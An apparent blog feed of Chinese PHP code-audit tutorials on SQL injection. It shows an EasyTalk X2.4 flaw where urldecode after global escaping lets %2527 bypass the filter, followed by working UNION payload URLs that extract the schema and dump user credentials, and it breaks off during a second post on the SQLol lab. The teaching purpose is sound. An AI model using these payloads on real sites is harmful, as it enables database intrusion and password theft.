&lt;h2 id=&quot;0x02_环境搭建&quot;&gt;0x02 环境搭建&lt;/h2&gt;&lt;p&gt;看背景我们使用了低版本的easytalk程序，版本为X2.4&lt;br&gt;①源码我打包了一份：&lt;a href=&quot;http://pan.baidu.com/s/1bopOFNL&quot; title=&quot;easytalk.zip&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://pan.baidu.com/s/1bopOFNL&lt;/a&gt;&lt;br&gt;②解压到www的easytalk目录下，按照提示一步步安装即可，遇到问题自行百度或谷歌，成功后访问如下图：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql01_2.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x03_漏洞分析&quot;&gt;0x03 漏洞分析&lt;/h2&gt;&lt;p&gt;首先看下源码结构，用的ThinkPHP框架，比较复杂：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql01_3.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;有兴趣的可以去研究下再继续往下看，新手可以知道ThinkPHP对接收的参数是有过滤的，并且根据你服务器是否开启GPC会做相应的处理：&lt;br&gt;1./ThinkPHP/Extend/Library/ORG/Util/Input.class.php文件第266行：&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;comment&quot;&gt;/**&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    +----------------------------------------------------------&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    * 如果 magic_quotes_gpc 为关闭状态，这个函数可以转义字符串&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    +----------------------------------------------------------&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    * &lt;span class=&quot;doctag&quot;&gt;@access&lt;/span&gt; public&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    +----------------------------------------------------------&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    * &lt;span class=&quot;doctag&quot;&gt;@param&lt;/span&gt; string $string 要处理的字符串&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    +----------------------------------------------------------&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    * &lt;span class=&quot;doctag&quot;&gt;@return&lt;/span&gt; string&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    +----------------------------------------------------------&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    */&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;   &lt;span class=&quot;keyword&quot;&gt;static&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;public&lt;/span&gt; &lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;addSlashes&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;(&lt;span class=&quot;variable&quot;&gt;$string&lt;/span&gt;)&lt;/span&gt; &lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;       &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (!get_magic_quotes_gpc()) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;           &lt;span class=&quot;variable&quot;&gt;$string&lt;/span&gt; = addslashes(&lt;span class=&quot;variable&quot;&gt;$string&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;       &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;       &lt;span class=&quot;keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$string&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;   &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;2.使用Seay代码审计系统的全局搜索功能，搜索包含关键字为”urldecode”的文件，发现TopicAction.class.php包含一个对接收的参数keyword进行urldecode并且有sql查询的地方：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql01_4.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;3.我们跟进这个php文件，发现接收keyword就对其进行urldecode转码，然后立即带入查询，造成注入：&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;public&lt;/span&gt; &lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;topic&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;()&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;variable&quot;&gt;$keyword&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;_get(&lt;span class=&quot;string&quot;&gt;&#39;keyword&#39;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&#39;urldecode&#39;&lt;/span&gt;);&lt;span class=&quot;comment&quot;&gt;//使用ThinkPHP框架自带的_get对接收的keyword参数进行urldecode(详见http://doc.thinkphp.cn/manual/get_system_var.html)&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$keyword&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$topic&lt;/span&gt; = D(&lt;span class=&quot;string&quot;&gt;&#39;Topic&#39;&lt;/span&gt;)-&amp;gt;where(&lt;span class=&quot;string&quot;&gt;&quot;topicname=&#39;$keyword&#39;&quot;&lt;/span&gt;)-&amp;gt;find();&lt;span class=&quot;comment&quot;&gt;//ok，带入查询了&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$topic&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;variable&quot;&gt;$isfollow&lt;/span&gt; = D(&lt;span class=&quot;string&quot;&gt;&#39;Mytopic&#39;&lt;/span&gt;)-&amp;gt;isfollow(&lt;span class=&quot;variable&quot;&gt;$topic&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;id&#39;&lt;/span&gt;], &lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;my[&lt;span class=&quot;string&quot;&gt;&#39;user_id&#39;&lt;/span&gt;]);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;variable&quot;&gt;$topicusers&lt;/span&gt; = D(&lt;span class=&quot;string&quot;&gt;&#39;MytopicView&#39;&lt;/span&gt;)-&amp;gt;where(&lt;span class=&quot;string&quot;&gt;&quot;topicid=&#39;$topic[id]&#39;&quot;&lt;/span&gt;)-&amp;gt;order(&lt;span class=&quot;string&quot;&gt;&#39;id desc&#39;&lt;/span&gt;)-&amp;gt;limit(&lt;span class=&quot;number&quot;&gt;9&lt;/span&gt;)-&amp;gt;select();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;variable&quot;&gt;$widget&lt;/span&gt; = M(&lt;span class=&quot;string&quot;&gt;&#39;Topicwidget&#39;&lt;/span&gt;)-&amp;gt;where(&lt;span class=&quot;string&quot;&gt;&quot;topicid=&#39;$topic[id]&#39;&quot;&lt;/span&gt;)-&amp;gt;order(&lt;span class=&quot;string&quot;&gt;&#39;`order` ASC&#39;&lt;/span&gt;)-&amp;gt;select();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$widget&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                &lt;span class=&quot;keyword&quot;&gt;foreach&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$widget&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$val&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                    &lt;span class=&quot;variable&quot;&gt;$topicwidget&lt;/span&gt;[&lt;span class=&quot;variable&quot;&gt;$val&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;widgettype&#39;&lt;/span&gt;]][] = &lt;span class=&quot;variable&quot;&gt;$val&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;assign(&lt;span class=&quot;string&quot;&gt;&#39;topicwidget&#39;&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$topicwidget&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &amp;#125; &lt;span class=&quot;keyword&quot;&gt;else&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;variable&quot;&gt;$count&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$isfollow&lt;/span&gt; = &lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;assign(&lt;span class=&quot;string&quot;&gt;&#39;comefrom&#39;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&#39;topic&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;assign(&lt;span class=&quot;string&quot;&gt;&#39;keyword&#39;&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$keyword&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;assign(&lt;span class=&quot;string&quot;&gt;&#39;topic&#39;&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$topic&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;assign(&lt;span class=&quot;string&quot;&gt;&#39;topicusers&#39;&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$topicusers&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;assign(&lt;span class=&quot;string&quot;&gt;&#39;isfollow&#39;&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$isfollow&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;assign(&lt;span class=&quot;string&quot;&gt;&#39;subname&#39;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&#39;#&#39;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$keyword&lt;/span&gt; . &lt;span class=&quot;string&quot;&gt;&#39;#&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;display();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &amp;#125; &lt;span class=&quot;keyword&quot;&gt;else&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        header(&lt;span class=&quot;string&quot;&gt;&quot;location:&quot;&lt;/span&gt; . SITE_URL . &lt;span class=&quot;string&quot;&gt;&#39;/?m=topic&amp;amp;a=index&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x04_漏洞证明&quot;&gt;0x04 漏洞证明&lt;/h2&gt;&lt;p&gt;1.我们构造获取数据库相关信息的POC：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&lt;span class=&quot;rule&quot;&gt;&lt;span class=&quot;attribute&quot;&gt;http&lt;/span&gt;:&lt;span class=&quot;value&quot;&gt;//localhost/eazytalk/?m=topic&amp;amp;a=topic&amp;amp;keyword=aaa%&lt;span class=&quot;number&quot;&gt;2527&lt;/span&gt; and &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;=&lt;span class=&quot;number&quot;&gt;2&lt;/span&gt; union select &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;,&lt;span class=&quot;number&quot;&gt;2&lt;/span&gt;,&lt;span class=&quot;number&quot;&gt;3&lt;/span&gt;,&lt;span class=&quot;function&quot;&gt;concat&lt;/span&gt;(&lt;span class=&quot;function&quot;&gt;database&lt;/span&gt;(),&lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;x5c,&lt;span class=&quot;function&quot;&gt;user&lt;/span&gt;(),&lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;x5c,&lt;span class=&quot;function&quot;&gt;version&lt;/span&gt;()),&lt;span class=&quot;number&quot;&gt;5&lt;/span&gt; %&lt;span class=&quot;number&quot;&gt;23&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;成功获取到信息如下：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql01_7.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;查看下MySql日志，发现成功执行了sql语句：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql01_8.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;2.我们构造获取数据库eazytalk所有表的POC：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&lt;span class=&quot;keyword&quot;&gt;http&lt;/span&gt;://localhost/eazytalk/?m=topic&amp;amp;&lt;span class=&quot;operator&quot;&gt;a&lt;/span&gt;=topic&amp;amp;keyword=aaa%&lt;span class=&quot;number&quot;&gt;2527&lt;/span&gt; &lt;span class=&quot;operator&quot;&gt;and&lt;/span&gt; &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;=&lt;span class=&quot;number&quot;&gt;2&lt;/span&gt; &lt;span class=&quot;built_in&quot;&gt;union&lt;/span&gt; select &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;,&lt;span class=&quot;number&quot;&gt;2&lt;/span&gt;,&lt;span class=&quot;number&quot;&gt;3&lt;/span&gt;, (select GROUP_CONCAT(DISTINCT table_name) &lt;span class=&quot;built_in&quot;&gt;from&lt;/span&gt; information_schema.tables where table_schema=&lt;span class=&quot;number&quot;&gt;0x6561737974616C6B&lt;/span&gt;),&lt;span class=&quot;number&quot;&gt;5&lt;/span&gt;%&lt;span class=&quot;number&quot;&gt;23&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;成功获取所有表信息如下：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql01_9.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;4.构造获取表et_users所有字段信息的POC：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&lt;span class=&quot;keyword&quot;&gt;http&lt;/span&gt;://localhost/eazytalk/?m=topic&amp;amp;&lt;span class=&quot;operator&quot;&gt;a&lt;/span&gt;=topic&amp;amp;keyword=aaa%&lt;span class=&quot;number&quot;&gt;2527&lt;/span&gt; &lt;span class=&quot;operator&quot;&gt;and&lt;/span&gt; &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;=&lt;span class=&quot;number&quot;&gt;2&lt;/span&gt; &lt;span class=&quot;built_in&quot;&gt;union&lt;/span&gt; select &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;,&lt;span class=&quot;number&quot;&gt;2&lt;/span&gt;,&lt;span class=&quot;number&quot;&gt;3&lt;/span&gt;, (select GROUP_CONCAT(DISTINCT column_name) &lt;span class=&quot;built_in&quot;&gt;from&lt;/span&gt; information_schema.columns where table_name=&lt;span class=&quot;number&quot;&gt;0x65745F7573657273&lt;/span&gt;),&lt;span class=&quot;number&quot;&gt;5&lt;/span&gt;%&lt;span class=&quot;number&quot;&gt;23&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;成功获取表et_users所有字段信息如下：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql01_10.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;5.构造获取et_users表第一条账户的POC：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&lt;span class=&quot;keyword&quot;&gt;http&lt;/span&gt;://localhost/eazytalk/?m=topic&amp;amp;&lt;span class=&quot;operator&quot;&gt;a&lt;/span&gt;=topic&amp;amp;keyword=aaa%&lt;span class=&quot;number&quot;&gt;2527&lt;/span&gt; &lt;span class=&quot;operator&quot;&gt;and&lt;/span&gt; &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;=&lt;span class=&quot;number&quot;&gt;2&lt;/span&gt; &lt;span class=&quot;built_in&quot;&gt;union&lt;/span&gt; select &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;,&lt;span class=&quot;number&quot;&gt;2&lt;/span&gt;,&lt;span class=&quot;number&quot;&gt;3&lt;/span&gt;, (select GROUP_CONCAT(DISTINCT user_name,&lt;span class=&quot;number&quot;&gt;0x5f&lt;/span&gt;,password) &lt;span class=&quot;built_in&quot;&gt;from&lt;/span&gt; et_users limit &lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;,&lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;),&lt;span class=&quot;number&quot;&gt;5&lt;/span&gt;%&lt;span class=&quot;number&quot;&gt;23&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;成功获取表admin的账户密码如下：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql01_11.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;本文由HackBraid整理总结，原文链接：&lt;a href=&quot;http://www.cnbraid.com/2015/12/24/sql1/&quot;&gt;http://www.cnbraid.com/2015/12/24/sql1/&lt;/a&gt;，如需转载请联系作者。&lt;/p&gt;
</content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;0x01_背景&quot;&gt;0x01 背景&lt;/h2&gt;&lt;p&gt;现在的WEB程序基本都有对SQL注入的全局过滤，像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤，尤其是单引号。遇到这种情况我们就需要找一些编码解码的函数来绕过全局防护，这篇文章讲urldecode()的情况，同样大牛请自觉绕道~&lt;br&gt;&lt;strong&gt;漏洞来源于乌云：&lt;a href=&quot;http://www.wooyun.org/bugs/wooyun-2014-050338&quot;&gt;http://www.wooyun.org/bugs/wooyun-2014-050338&lt;/a&gt;&lt;/strong&gt;&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlbypass1.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;
    
    </summary>
    
      <category term="WEB应用漏洞" scheme="http://www.cnbraid.com/categories/WEB%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/"/>
    
    
      <category term="PHP" scheme="http://www.cnbraid.com/tags/PHP/"/>
    
      <category term="SQL注入" scheme="http://www.cnbraid.com/tags/SQL%E6%B3%A8%E5%85%A5/"/>
    
      <category term="代码审计" scheme="http://www.cnbraid.com/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
    
  </entry>
  
  <entry>
    <title>【PHP代码审计】 那些年我们一起挖掘SQL注入 - 1.什么都没过滤的入门情况</title>
    <link href="http://www.cnbraid.com/2015/12/17/sql0/"/>
    <id>http://www.cnbraid.com/2015/12/17/sql0/</id>
    <published>2015-12-17T09:35:00.000Z</published>
    <updated>2016-06-24T08:55:53.839Z</updated>
    
    <content type="html">&lt;h2 id=&quot;0x01_背景&quot;&gt;0x01 背景&lt;/h2&gt;&lt;p&gt;首先恭喜Seay法师的力作《代码审计：企业级web代码安全架构》，读了两天后深有感触。想了想自己也做审计有2年了，决定写个PHP代码审计实例教程的系列，希望能够帮助到新人更好的了解这一领域，同时也作为自己的一种沉淀。大牛请自觉绕道~&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;&lt;a id=&quot;more&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x02_环境搭建&quot;&gt;0x02 环境搭建&lt;/h2&gt;&lt;p&gt;PHP+MySql的集成环境特别多，像PhpStudy、Wamp和Lamp等下一步下一步点下去就成功安装了，网上搜索一下很多就不赘述。&lt;br&gt;这里提的环境是SQLol，它是一个可配置的SQL注入测试平台，包含了简单的SQL注入测试环境，即SQL语句的四元素增（Insert）、删（Delete）、改（Update）和查（Select）。&lt;br&gt;PS：什么都没过滤的情况太少了，现在再怎么没有接触过安全的程序员都知道用一些现成的框架来写代码，都有过滤的。所以这个平台主要训练在各种情况下如何进行sql注入以及如何写POC。&lt;br&gt;①源码我打包了一份：&lt;a href=&quot;http://pan.baidu.com/s/1nu2vaOT&quot; title=&quot;Sqlol.zip&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://pan.baidu.com/s/1nu2vaOT&lt;/a&gt;&lt;br&gt;②解压到www的sql目录下，直接打开&lt;a href=&quot;http://localhost/sql即可看到如下界面：&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://localhost/sql即可看到如下界面：&lt;/a&gt;&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql1.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x03_漏洞分析&quot;&gt;0x03 漏洞分析&lt;/h2&gt;&lt;p&gt;首先看下源码结构，比较简单，只有一个include文件夹包含一些数据库配置文件：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlol0.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;这里进行简单的源码分析，看不懂就略过以后再看~&lt;br&gt;1.看select.php文件，开始引入了/include/nav.inc.php&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;include&lt;/span&gt;(&lt;span class=&quot;string&quot;&gt;&#39;includes/nav.inc.php&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;2.跟进nav.inc.php文件，发现该文件是select的核心表单提交页面以及输入处理程序：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlol2.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;表单的输入处理程序比较简单，主要是根据你表单的选择作出相应的过滤和处理，如下&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt; = array_merge(&lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$_COOKIE&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;keyword&quot;&gt;isset&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;submit&#39;&lt;/span&gt;])) &amp;#123; &lt;span class=&quot;comment&quot;&gt;//submit后，开始进入处理程序&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;keyword&quot;&gt;switch&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;sanitize_quotes&#39;&lt;/span&gt;]) &amp;#123; &lt;span class=&quot;comment&quot;&gt;//单引号的处理，表单选择不过滤，就是对应none，新手看不懂可以学好php再回来&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;keyword&quot;&gt;case&lt;/span&gt; &lt;span class=&quot;string&quot;&gt;&#39;quotes_double&#39;&lt;/span&gt;:&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;] = str_replace(&lt;span class=&quot;string&quot;&gt;&#39;\&#39;&#39;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&#39;\&#39;\&#39;&#39;&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;]);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;keyword&quot;&gt;break&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;keyword&quot;&gt;case&lt;/span&gt; &lt;span class=&quot;string&quot;&gt;&#39;quotes_escape&#39;&lt;/span&gt;:&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;] = str_replace(&lt;span class=&quot;string&quot;&gt;&#39;\&#39;&#39;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&#39;\\\&#39;&#39;&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;]);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;keyword&quot;&gt;break&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;keyword&quot;&gt;case&lt;/span&gt; &lt;span class=&quot;string&quot;&gt;&#39;quotes_remove&#39;&lt;/span&gt;:&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;            &lt;span class=&quot;variable&quot;&gt;$_REQUEST&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;inject_string&#39;&lt;/span&gt;] = str_replace(&lt;span class=&quot;string&quot;&gt;&#39;\&#39;&#39;&lt;/span&gt;, &lt;span 